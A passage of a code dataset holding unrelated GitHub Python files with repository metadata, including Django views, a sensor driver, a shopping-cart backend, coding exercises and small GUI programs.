print(\"Creating journal at {}\".format(journal_path))\n try:\n os.makedirs(os.path.dirname(journal_path))\n except FileExistsError:\n pass\n blank_journal = {\"posts\": []}\n with open(journal_path, \"w\") as journal_file:\n journal_file.write(json.dumps(blank_journal))\n return True\n\ndef run_cli(args):\n config_set = check_for_configuration(args)\n if config_set.get(args.journal):\n if args.debug:\n debug_output(config_set, args)\n journal_check = check_for_journal(config_set.get(args.journal))\n if journal_check:\n return [journal_check, 0]\n else:\n print(\"Error creating journal at {}\".format(args.journal))\n return False\n else:\n print(\"Journal not found: {}\".format(args.journal))\n return False\n\n\ndef add_notebook(args):\n current_notebooks = toml.load(args.file_path)\n new_notebook = input(\"New notebook name: ? \")\n if new_notebook:\n current_notebooks[new_notebook] = {\n \"journal_path\": \"{}/{}/journal.json\".format(args.storage_path, new_notebook)}\n with open(args.file_path, \"w\") as config_file:\n config_file.write(toml.dumps(current_notebooks))\n return [0, 0]\n","repo_name":"numbertheory/nts","sub_path":"nts/nts.py","file_name":"nts.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23915190774","text":"# In this simple exercise, you will create a program that will take two lists of\n# integers, a and b. Each list will consist of 3 positive integers above 0,\n# representing the dimensions of cuboids a and b. You must find the difference of\n# the cuboids' volumes regardless of which is bigger.\n\n# For example, if the parameters passed are ([2, 2, 3], [5, 4, 1]), the volume\n# of a is 12 and the volume of b is 20. Therefore, the function should return 8.\n\n# Your function will be tested with pre-made examples as well as random ones.\n\n# If you can, try writing it in one line of code.\n\nimport codewars_test as test\n\n\ndef find_difference(a, b):\n a_product = 1\n b_product = 1\n for number in a:\n a_product *= number\n for number in b:\n b_product *= number\n return abs(a_product - b_product)\n\n\n@test.describe(\"Fixed Tests\")\ndef fixed_tests():\n @test.it(\"Basic Test Cases\")\n def basic_test_cases():\n test.assert_equals(\n find_difference([3, 2, 5], [1, 4, 4]),\n 14,\n \"{0} should equal 14\".format(find_difference([3, 2, 5], [1, 4, 4])),\n )\n test.assert_equals(\n find_difference([9, 7, 2], [5, 2, 2]),\n 106,\n \"{0} should equal 106\".format(find_difference([9, 7, 2], [5, 2, 2])),\n )\n test.assert_equals(\n find_difference([11, 2, 5], [1, 10, 8]),\n 30,\n \"{0} should equal 30\".format(find_difference([11, 2, 5], [1, 10, 8])),\n )\n test.assert_equals(\n find_difference([4, 4, 7], [3, 9, 3]),\n 31,\n \"{0} should equal 31\".format(find_difference([4, 4, 7], [3, 9, 3])),\n )\n test.assert_equals(\n find_difference([15, 20, 25], [10, 30, 25]),\n 0,\n \"{0} should equal 0\".format(find_difference([15, 20, 25], [10, 30, 25])),\n )\n\n\n@test.describe(\"Random Tests:\")\ndef random_tests():\n from random import randint\n from functools import reduce\n\n for x in range(50):\n a = [randint(1, 30), randint(1, 30), randint(1, 30)]\n b = [randint(1, 30), randint(1, 30), randint(1, 30)]\n expected = abs(reduce(lambda x, y: x * y, a) - reduce(lambda x, y: x * y, b))\n\n @test.it(f\"testing for find_difference({a}, {b})\")\n def test_case():\n test.assert_equals(find_difference(a, b), expected)\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"codewars/python/difference_of_volumes_of_cuboids.py","file_name":"difference_of_volumes_of_cuboids.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33386866381","text":"#!/usr/bin/env python3\n\nfrom enum import Enum\nimport logging\n\ntry:\n # latest Blinka supports x86 LinuxPC, but we don't at least not chips on I²C\n from adafruit_platformdetect import Detector\n if Detector().board.id == 'GENERIC_LINUX_PC':\n raise NotImplementedError\n\n import board\n import busio\n import adafruit_ads1x15.ads1115 as ADS\n # import adafruit_ads1x15.ads1015 as ADSxx\n from adafruit_ads1x15.analog_in import AnalogIn\n\n SIMULATED = False\nexcept NotImplementedError:\n SIMULATED = True\n\n class ADS(Enum):\n P0, P1, P2, P3 = range(0, 4)\n\nfrom .base import (AInDriver, IoPort, PortFunc)\n\nlog = logging.getLogger('DriverADS111x')\nlog.brief = log.warning # alias, warning used as brief info, info is verbose\n\nlog.setLevel(logging.WARNING)\n# log.setLevel(logging.INFO)\n# log.setLevel(logging.DEBUG)\n\n\n# ========== ADC inputs ==========\n\n\nadc_count = 0\n\n\nclass DriverADS1115(AInDriver):\n \"\"\" A driver for TI's 16bit ADC ADS1113/4/5, and 12bit ADS1013/4/5\n # back to defaults to enable our auto-datect\n Chip variants:\n ADS1x13 1 channel, no comparator\n ADS1x14 1 channel, gain adjustable\n ADS1x15 4 channel or 2 differential, gain adjustable\n Sample rate and continuous mode not supported. Differential isn't yet.\n \"\"\"\n\n ADDRESSES = [0x48, 0x49, 0x4A, 0x4B]\n CHANNELS = [ADS.P0, ADS.P1, ADS.P2, ADS.P3] # ATM no differential channels\n\n @staticmethod\n def is_ads111x(ads):\n \"\"\" check power-on register defaults of ADS1113/4/5\n \"\"\"\n try:\n buf = bytearray(8)\n with ads.i2c_device as device:\n device.write_then_readinto(bytearray([0]), buf, in_start=0, in_end=2)\n device.write_then_readinto(bytearray([1]), buf, in_start=2, in_end=4)\n device.write_then_readinto(bytearray([2]), buf, in_start=4, in_end=6)\n device.write_then_readinto(bytearray([3]), buf, in_start=6, in_end=8)\n # default is: in 0-1 differential, gain 2, 1 shot, 128SPS, comp low, no latch, disable comp\n if buf[2:8] == bytearray.fromhex('8583 8000 7FFF'):\n return True\n if buf[3:8] == bytearray.fromhex('83 8000 7FFF'): # TODO: DBG REMOVE_ME!\n return True\n log.debug('I²C device @ 0x%02X returns 0x%s 0x%s 0x%s' +\n ' from reg 1..3, probably a different device,' +\n ' or already in use.',\n device.device_address,\n bytes(buf[2:4]).hex(),\n bytes(buf[4:6]).hex(),\n bytes(buf[6:8]).hex())\n except Exception as ex:\n log.debug('Exception %r', ex)\n # pass # whatever it is, ignore device @ this adr!\n return False\n\n @staticmethod\n def find_ports():\n global adc_count # pylint: disable=W0603\n\n io_ports = {}\n if not SIMULATED:\n # autodetect of I²C is undefined and risky, as some chips may react\n # on read as if it was a write! We're on a pretty well defined HW though.\n i2c = busio.I2C(board.SCL, board.SDA)\n deps = ['GPIO %d in' % board.SCL.id, 'GPIO %d out' % board.SCL.id,\n 'GPIO %d in' % board.SDA.id, 'GPIO %d out' % board.SDA.id]\n\n # one loop for each chip type\n log.brief('Scanning I²C bus for ADS1x13/4/5 ...')\n for adr in DriverADS1115.ADDRESSES:\n try:\n ads = ADS.ADS1115(i2c, address=adr)\n if DriverADS1115.is_ads111x(ads):\n adc_count += 1\n for ch in DriverADS1115.CHANNELS:\n port_name = 'ADC #%d in %d' % (adc_count, ch)\n port_cfg = {'adr': adr, 'cnt': adc_count, 'in': ch}\n io_ports[port_name] = IoPort(PortFunc.Ain,\n DriverADS1115,\n port_cfg,\n deps)\n else:\n log.brief('I²C device at 0x%02X seems not to be an ADS1x15, probably a different device, or already in use.', adr)\n except Exception as ex:\n log.debug('%r', ex)\n # pass # whatever it is, ignore this device\n else: # SIMULATED\n deps = ['GPIO 2 in', 'GPIO 2 out']\n adc_count += 1\n port_name = 'ADC #%d in ' % adc_count\n # name: IoPort(portFunction, drvClass, configDict, dependantsArray)\n io_ports = {\n port_name + '0': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 0, 'fake': True}, deps),\n port_name + '1': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 1, 'fake': True}, deps),\n port_name + '2': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 2, 'fake': True}, deps),\n port_name + '3': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 3, 'fake': True}, deps)\n }\n return io_ports\n\n def __init__(self, cfg, func):\n super().__init__(cfg, func)\n self.name = 'ADC #%d (ADS1115 @0x%02X) in %d' % (cfg['cnt'], cfg['adr'], cfg['in'])\n self.cfg = cfg\n\n self.gain = cfg.get('gain', -16)\n i2c = busio.I2C(board.SCL, board.SDA)\n self._ads = ADS.ADS1115(i2c, address=cfg['adr'], gain=(abs(self.gain)))\n self._ana_in = AnalogIn(self._ads, cfg['in'])\n\n def close(self):\n if self._fake:\n return super().close()\n\n # return chip to power-on defaults to allow future auto-detect\n self._ads.gain = 2\n self._ads.read(0, is_differential=True)\n\n def read(self):\n if self._fake:\n return super().read()\n\n self._adjust_gain()\n # val = self._ana_in.voltage\n median = [self._ana_in.voltage,\n self._ana_in.voltage,\n self._ana_in.voltage,\n self._ana_in.voltage,\n self._ana_in.voltage]\n median.sort()\n log.debug('median %f %f %f', median[0], median[2], median[4])\n val = median[2]\n\n return val\n\n def _adjust_gain(self):\n \"\"\" gain <= 0 is auto-gain.\n Since there's only a common gain for all channels,\n we need repeated conversions, and increase I2C traffic.\n \"\"\"\n ads = self._ads\n ads.gain = abs(self.gain)\n if self.gain <= 0:\n val = self._ana_in.value\n while abs(val) > 32300:\n l_gain = [ads.gains[0]] + [g for g in ads.gains if g < ads.gain]\n ads.gain = l_gain[-1]\n val = self._ana_in.value\n while abs(val) < 16000:\n h_gain = [g for g in ads.gains if g < ads.gain] + [ads.gains[-1]]\n ads.gain = h_gain[0]\n val = self._ana_in.value\n self.gain = -ads.gain\n log.debug('ADS gain %d (%d), digits %f', ads.gain, self.gain, val)\n","repo_name":"schwabix-1311/aquaPI","sub_path":"aquaPi/driver/DriverADC.py","file_name":"DriverADC.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4679597907","text":"from django.test import TestCase\nfrom django.utils import timezone\n\nfrom core.tests.test_views import set_up_test_case_data\n\nclass MatchmakingTestCase(TestCase):\n\n @staticmethod\n def _get_url(id, type):\n return f'/{type}/{id}/matches'\n\n\n def setUp(self) -> None:\n set_up_test_case_data(self)\n \n def test_matchmaking_for_project(self):\n \n url = self._get_url(1, 'investors')\n response = self.client.get(url)\n matches_data = response.data\n\n self.assertEqual(len(matches_data), 1)\n self.assertEqual(matches_data[0]['id'], self.good_investor.id)\n self.assertEqual(response.status_code, 200) \n\n\n def test_matchmaking_for_investor(self):\n \n url = self._get_url(1, 'projects')\n response = self.client.get(url)\n matches_data = response.data\n\n self.assertEqual(len(matches_data), 1)\n self.assertEqual(matches_data[0]['id'], self.good_project.id)\n self.assertEqual(response.status_code, 200) \n","repo_name":"Wojlos/Projects-and-investors","sub_path":"recruitment_task/core/businesslogic/tests/test_matchmaking.py","file_name":"test_matchmaking.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12848132651","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView\n\nfrom .forms import *\nfrom .models import *\nfrom django.utils import timezone\n\n\ndef home(request):\n context = {}\n limit = 10\n posts = Post.objects.all()[:limit]\n context['posts'] = posts\n return render(request, 'goods/home.html', context)\n\n\ndef categories(request):\n context = {\n 'categories': Category.objects.all(),\n 'children':Category.objects.all,\n }\n return render(request, 'goods/category.html', context)\n\n\ndef basket(request):\n return render(request, 'goods/basket.html')\n\n\n# def user_login(request):\n# if request.method == 'POST':\n# form = LoginForm(request.POST)\n# if form.is_valid():\n# cd = form.cleaned_data\n# user = authenticate(username=cd['username'], password=cd['password'])\n# if user is not None:\n# if user.is_active:\n# login(request, user)\n# else:\n# form = LoginForm(request.POST)\n# return render(request, 'goods/u_login.html', {'form': form})\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db() # load the profile instance created by the signal\n user = form.save()\n login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n return redirect('home')\n else:\n form = SignUpForm()\n return render(request, 'signup.html', {'form': form})\n\n\ndef post(request, pk):\n post = Post.objects.get(pk=pk)\n form = CommentForm()\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = Comment(\n author=form.cleaned_data[\"author\"],\n body=form.cleaned_data[\"body\"],\n post=post\n )\n comment.save()\n\n comments = Comment.objects.filter(post=post)\n context = {\n \"post\": post,\n \"comments\": comments,\n \"form\": form,\n }\n return render(request, 'goods/post.html', context)\n\n\nclass Search(ListView):\n template_name = 'search/search.html'\n context_object_name = 'posts'\n paginate_by = 5\n\n def get_queryset(self):\n return Post.objects.filter(\n Q(title__icontains=self.request.GET.get('s')))\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['s'] = f\"s={self.request.GET.get('s')}&\"\n return context\n\n\nclass PostsByCategory(ListView):\n template_name = 'goods/home.html'\n context_object_name = 'posts'\n allow_empty = True\n\n def get_queryset(self):\n return Post.objects.filter(category_slug=self.kwargs['slug'])\n\n def get_context_data(self, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = Category.objects.get(slug=self.kwargs['slug'])\n return context\n\n\nclass AddPage(LoginRequiredMixin, CreateView):\n form_class = PostCreateForm\n template_name = 'goods/createpost.html'\n success_url = reverse_lazy('home')\n login_url = reverse_lazy('home')\n raise_exception = True\n\n # def get_context_data(self, *, object_list=None, **kwargs):\n # context = super().get_context_data(**kwargs)\n # c_def = self.get_user_context(title=\"Добавление статьи\")\n # return dict(list(context.items()) + list(c_def.items()))\n\n\ndef addpost(request):\n if request.method == 'POST':\n form = PostCreateForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=True)\n post.author = request.user\n form.save()\n return redirect('home')\n else:\n form = PostCreateForm()\n return render(request, 'goods/createpost.html', {'form': form})\n\n\ndef profile(request):\n # profile = User.objects.POST.get(pk=pk)\n # context = {\n # 'profile': profile,\n #\n # }\n return render(request, 'goods/profile.html')\n\n# class ProfileDetail(DetailView):\n# model = Profile\n# context_object_name = 'profile'\n# template_name = 'goods/profile.html'\n","repo_name":"DrBATCOH/django-project-website-","sub_path":"website/goods/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28139071813","text":"#!/usr/bin/env python3\nimport socket\nimport sys\nimport time\nimport random\nfrom _thread import *\nfrom threading import Thread, Lock\n\n# PORT at which the server runs\nSERVER_PORT = 1234\n\n# Some of the requests which are CPU intensive and take more time to process at the server end \nload_list = [22,23,24]\n\n# Client thread will execute this function\ndef client_thread(SERVER_IP):\n # Notifying this thread about all the relevant global variables\n global load_list\n\n # List of all sockets\n socketsList = []\n \n try:\n # Creating and appending the socket to the sockets list\n socketsList.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\n\n # Connecting to the server\n socketsList[len(socketsList) - 1].connect((SERVER_IP, SERVER_PORT))\n\n while True:\n # Send requests to server following the round-robin policy\n for i in range(0, len(socketsList)):\n socketsList[i].sendall(str(random.choice(load_list)).encode('utf-8'))\n response = socketsList[i].recv(1024)\n result = int(response.decode('utf-8'))\n print(\"Received the result : \" + str(result))\n time.sleep(1.5)\n except:\n print(\"Error occurred while creating socket!\")\n\n# The main thread will start other threads\ndef Main():\n print(\"Server IP : \" + str(sys.argv[1]))\n client = Thread(target=client_thread, args=(str(sys.argv[1]), ))\n client.start()\n # The main thread will wait for the client thread to complete its execution\n client.join()\n\nif __name__ == '__main__':\n Main()","repo_name":"pradhanaditya/CS695-Container-Runtime","sub_path":"testcases/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23512812499","text":"# Flask related\nfrom flask import Flask, request, render_template\nfrom flask import jsonify\nfrom flask_pymongo import PyMongo\n\n# Standard library\nimport json\nimport datetime as dt\nfrom bson import json_util\nimport uuid\n\nfrom inventory_func import inventory_management\n\ndef cart_management(input_json, used_db, response_json):\n\tdict_temp = dict({key:val for key, val in input_json.items() if (key != '_id') & (key != 'event')})\n\tdict_temp[\"last_modified\"] = dict_temp.pop(\"event_timestamp\")\n\tdict_temp[\"payment_status\"] = 0\n\t\n\tcoll = used_db[\"shopping_cart\"]\n\n\tquery_temp = {\"customer_id\": dict_temp[\"customer_id\"], \"payment_status\": dict_temp[\"payment_status\"] }\n\t\n\t# Check current customer's cart\n\tcheck_existing = coll.find_one(query_temp)\n\n\tif input_json[\"event\"] == \"get_item\":\n\n\t\tdict_temp[\"cart\"] = [dict_temp.pop(\"item\")]\n\n\t\tresult = 0\n\n\t\tif not check_existing:\n\t\t\t# Add new cart when customer is not flagged yet\n\t\t\tresult = coll.insert_one(dict_temp)\n\t\telse: # Existing cart\n\t\t\t# Loop cart item\n\t\t\tfor i in dict_temp[\"cart\"]:\n\t\t\t\tfor j in check_existing[\"cart\"]:\n\t\t\t\t\t# If existing item is found, add quantity\n\t\t\t\t\tif (i[\"inventory_id\"] == j[\"inventory_id\"]):\n\t\t\t\t\t\tquery_temp[\"cart.inventory_id\"] = i[\"inventory_id\"]\n\t\t\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$inc\": {\"cart.$.quantity\": i[\"quantity\"]} })\n\t\t\tif not (result):\n\t\t\t\t# if no existing item, add item to cart\n\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$push\": {\"cart\": i} })\n\n\t\tif (result):\n\t\t\tresponse_json[\"message\"] = \"item added to cart\"\n\t\telse:\n\t\t\tresponse_json[\"message\"] = \"error\"\n\n\telif input_json[\"event\"] == \"put_back\":\n\n\t\tdict_temp[\"cart\"] = [dict_temp.pop(\"item\")]\n\t\t\n\t\tresult = 0\n\n\t\tif not check_existing:\n\t\t\tresponse_json[\"message\"] = \"cart error/do not exist\"\n\t\telse:\n\t\t\t# Loop cart item\n\t\t\tfor i in dict_temp[\"cart\"]:\n\t\t\t\tfor j in check_existing[\"cart\"]:\n\t\t\t\t\t# If existing item is found, reduce quantity\n\t\t\t\t\tif (i[\"inventory_id\"] == j[\"inventory_id\"]):\n\t\t\t\t\t\t# Check if there is enough item on cart\n\t\t\t\t\t\tif (j[\"quantity\"]) > (i[\"quantity\"]):\n\t\t\t\t\t\t\tquery_temp[\"cart.inventory_id\"] = i[\"inventory_id\"]\n\t\t\t\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$inc\": {\"cart.$.quantity\": -i[\"quantity\"]} })\n\t\t\t\t\t\t\tresponse_json[\"message\"] = \"item quantity reduced from cart\"\n\t\t\t\t\t\telif (j[\"quantity\"]) == (i[\"quantity\"]):\n\t\t\t\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$pull\": {\"cart\": {\"inventory_id\": i[\"inventory_id\"]} } })\n\t\t\t\t\t\t\tresponse_json[\"message\"] = \"item removed from cart\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tresponse_json[\"message\"] = \"not enough item in inventory\"\n\t\t\tif not (result):\n\t\t\t\t# if no existing item, error message\n\t\t\t\tresponse_json[\"message\"] = \"no such item in cart\"\n\t\t\n\n\telif input_json[\"event\"] == \"pay_item\":\n\n\t\tresult = 0\n\n\t\tif not check_existing:\n\t\t\tresponse_json[\"message\"] = \"cart error/do not exist\"\n\t\telse:\n\t\t\t# Loop cart item to be removed from inventory\n\t\t\tfor i in check_existing[\"cart\"]:\n\t\t\t\tinv_payload = i\n\t\t\t\tinv_payload[\"method\"] = \"update_qty\"\n\t\t\t\tcoll2 = used_db.product_inventory\n\t\t\t\tresponse_json = {}\n\t\t\t\tresponse_json = inventory_management(inv_payload, coll2, response_json)\n\t\t\t#query_temp = {key:val for key, val in dict_temp.items() if (key != 'time_out')}\n\t\t\t#coll.update_one(query_temp, {\"$set\": dict_temp})\n\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dt.datetime(dict_temp[\"last_modified\"]), \"payment_status\": 1}})\n\t\t\tresponse_json[\"payment\"] = \"item paid, inventory updated\"\n\n\telse:\n\t\tresponse_json[\"message\"] = \"error\"\n\n\treturn(response_json)\n\n\nif __name__== '__main__':\n\tprint(\"this is cart management function\")\n\n\n","repo_name":"md0798/Smart-Retail","sub_path":"Project-v2021-04-03-server-backend/cart_func.py","file_name":"cart_func.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"126237704","text":"# Author: Axel Antoine\n# https://axantoine.com\n\n# Loki, Inria project-team with Université de Lille\n# within the Joint Research Unit UMR 9189 CNRS-Centrale\n# Lille-Université de Lille, CRIStAL.\n# https://loki.lille.inria.fr\n\n# LICENCE: Licence.md\n\nfrom mycgal import *\n\ndef printPoint(p):\n\tprint(\"[%d,%d]\"%(p.x,p.y))\n\ndef printContour(c):\n\tfor p in c:\n\t\tprintPoint(p)\n\n\ns1 = Segment(Point(0,1),Point(6,1))\ns2 = Segment(Point(1,0),Point(1,6))\ns3 = Segment(Point(0,6),Point(6,0))\n\nsegments = VectorSegment()\nsegments.push_back(s1)\nsegments.push_back(s2)\nsegments.push_back(s3)\n\n\nregions = computeRegions(segments)\n\nfor region in regions:\n\tprintContour(region.contour)\n\t#print(region.holes)\n\n\n\n\n\n\n\n\n","repo_name":"LokiResearch/EsquisseBlender","sub_path":"wrapper_cgal/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"73098247527","text":"# -------------------- Python3 TLE, PyPy3 AC --------------------\n# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\nUP = 0\nDN = 1\n\n# ---------- Function ----------\ndef prime_factorization(num: int, state: int):\n div, sqrt = 2, int(num ** 0.5) + 1\n\n while div <= sqrt:\n if num % div: div += 1\n else:\n if state == UP: calculation[UP][div] += 1\n else: calculation[DN][div] += 1\n num //= div\n \n if num > 1:\n if state == UP: calculation[UP][num] += 1\n else: calculation[DN][num] += 1\n\n return\n\n# ---------- Main ----------\nnum = int(input())\ntext = list(input().rstrip().split())\n\nFLAG = UP\ncalculation = [[0] * 100001 for _ in range(2)]\n\nfor op in text:\n if op == \"0\": print(\"mint chocolate\"); exit()\n elif op == \"1\": continue\n elif op == \"*\": FLAG = UP\n elif op == \"/\": FLAG = DN\n else: prime_factorization(abs(int(op)), FLAG)\n \nfor i in range(2, 100001):\n if calculation[UP][i] < calculation[DN][i]:\n print(\"toothpaste\")\n break\nelse:\n print(\"mint chocolate\")\n \n# ---------- Comment ----------\n# eval(): RecursionError\n# sys.setrecursionlimit(35000): OverflowError\n# L36: int(op) > abs(int(op)) | WA\n# L33 add | TLE\n# L40 calculation[DN][i] add | TLE\n# 2d list > 1d list | TLE\n# Refatoring: 1. using defaultdict\n# 2. all prime calculate first\n# 3. In prime_factorization() not one by one, jumping next prime","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_20302.py","file_name":"acmicpc_20302.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36780947047","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom .views import homePage, eventPage, ownedTickets,singleTicket,eventTickets, marketplace\n\nurlpatterns = [\n path(\"\", homePage.as_view(), name=\"home\"),\n path(\"marketplace/\", marketplace.as_view(), name=\"marketplace\"),\n path(\"marketplace/\", marketplace.as_view(), name=\"marketplace\"),\n path(\"event/\", eventPage.as_view(), name=\"event\"),\n path(\"my-tickets/\", ownedTickets.as_view(), name=\"myTickets\"),\n path(\"ticket//\", singleTicket.as_view(), name=\"single_ticket\"),\n path(\"event//tickets\", eventTickets.as_view(), name=\"event_tickets\"),\n]\n","repo_name":"taleisa/Immutable-Ticketing","sub_path":"immutableTicketing/marketplace/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26328726022","text":"import json\nfrom pydantic import BaseModel\n\ndef BuildPotnetialRagerJson(PotentialRager):\n json = {\n \"playerName\": PotentialRager.playerName,\n \"recordingID\": PotentialRager.recordingID,\n \"reasons\": PotentialRager.reasons,\n \"reports\": PotentialRager.reports,\n \"game\": PotentialRager.game\n }\n return json\n\ndef BuildRagerJson(Rager):\n json = {\n \"playerName\": Rager.playerName,\n \"reports\": Rager.reports,\n \"game\": Rager.game\n }\n return json\ndef BuildAppealJson(appeal):\n json = {\n \"playerName\": appeal.playerName,\n \"reasons\": appeal.reasons,\n \"game\": appeal.game\n }\n return json\ndef BuildgetJson(get):\n json = {\n \"game\": get.game\n }\n return json\n\nclass PotentialRager(BaseModel):\n playerName: str\n recordingID: str\n reasons: str\n reports: int\n game: str\n\nclass Rager(BaseModel):\n playerName: str\n reports: int\n game: str\nclass Appeal(BaseModel):\n playerName: str\n reasons: str\n game: str\n\nclass getRagers(BaseModel):\n game: str\n\n\n","repo_name":"hjrandall/Predecessor-Rage-Finder-BE","sub_path":"JsonBuilder.py","file_name":"JsonBuilder.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4909600975","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_Emergente(object):\n def setupUi(self, Emergente, texto):\n Emergente.setObjectName(\"Emergente\")\n Emergente.resize(267, 109)\n\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"icono.ico\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n Emergente.setWindowIcon(icon)\n\n self.centralwidget = QtWidgets.QWidget(Emergente)\n self.centralwidget.setObjectName(\"centralwidget\")\n\n self.texto = QtWidgets.QLabel(self.centralwidget)\n self.texto.setGeometry(QtCore.QRect(20, 20, 231, 71))\n font = QtGui.QFont()\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(100)\n self.texto.setFont(font)\n self.texto.setAlignment(QtCore.Qt.AlignCenter)\n self.texto.setObjectName(\"texto\")\n\n Emergente.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(Emergente)\n self.statusbar.setObjectName(\"statusbar\")\n Emergente.setStatusBar(self.statusbar)\n\n self.retranslateUi(Emergente, texto)\n QtCore.QMetaObject.connectSlotsByName(Emergente)\n\n def retranslateUi(self, Emergente, textoEmergente):\n _translate = QtCore.QCoreApplication.translate\n Emergente.setWindowTitle(_translate(\"Emergente\", \"Mensaje\"))\n #self.texto.setText(_translate(\"Emergente\", \"Archivo codificado\\ncon éxito\"))\n self.texto.setText(_translate(\"Emergente\", textoEmergente))\n\n def escribir(self, texto):\n print(texto)\n textoEmergente = texto\n print(textoEmergente)\n self.retranslateUi(self, Emergente)\n\n","repo_name":"David-alzate/Programacion","sub_path":"python/Ejemplos Python/Ejemplo Ventana Emergente-20230901/emergente.py","file_name":"emergente.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38001378415","text":"import tkinter as tk\r\nimport webbrowser\r\nimport notes as n\r\nimport links_library as ll\r\nimport gpa_calculator as avg\r\n\r\n#Functions to call the modules\r\ndef press_button_one(): \r\n ll.window_one()\r\n\r\n\r\ndef press_button_two():\r\n avg.window_two()\r\n\r\n\r\ndef press_button_three():\r\n n.window_three()\r\n\r\n#Link to repository\r\ndef press_button_four():\r\n webbrowser.open(r'https://github.com/LukasJurc/toolkit')\r\n \r\n# Creation of the user interface\r\nmain = tk.Tk()\r\nmain.geometry(\"400x60\")\r\nmain.resizable(0,0)\r\nmain.title(\"GPB Tools\")\r\nmain_label = tk.Label(main, text=\"Wählen Sie Ihr Programm\")\r\nmain_label.pack()\r\n\r\nbutton_one = tk.Button(main, text=\"Linkbibliothek\", command = press_button_one)\r\nbutton_one.place(x=20, y=25, width=80, height=30)\r\n\r\n\r\nbutton_two = tk.Button(main, text=\"Durchschnitt\", command = press_button_two)\r\nbutton_two.place(x=110, y=25, width=80, height=30)\r\n\r\n\r\nbutton_three = tk.Button(main, text=\"Notizen\", command = press_button_three)\r\nbutton_three.place(x=200, y=25, width=80, height=30)\r\n\r\n\r\nbutton_four = tk.Button(main, text=\"Über uns\", command = press_button_four)\r\nbutton_four.place(x=290, y=25, width=80, height=30)\r\n\r\n\r\nmain.mainloop() \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LukasJurc/toolkit","sub_path":"start_program.py","file_name":"start_program.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6879154524","text":"import uuid\n\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db import models\n\nfrom core.mixins import BaseModel\n\n\nclass EventSecurityLayer(BaseModel):\n event = models.ForeignKey(\n 'event.Event',\n on_delete=models.CASCADE\n )\n security_layer = models.ForeignKey(\n 'event.SecurityLayer',\n on_delete=models.CASCADE,\n )\n level = models.PositiveIntegerField()\n\nclass EventSecurityLayerMember(BaseModel):\n event_security_layer = models.ForeignKey(\n 'event.EventSecurityLayer',\n 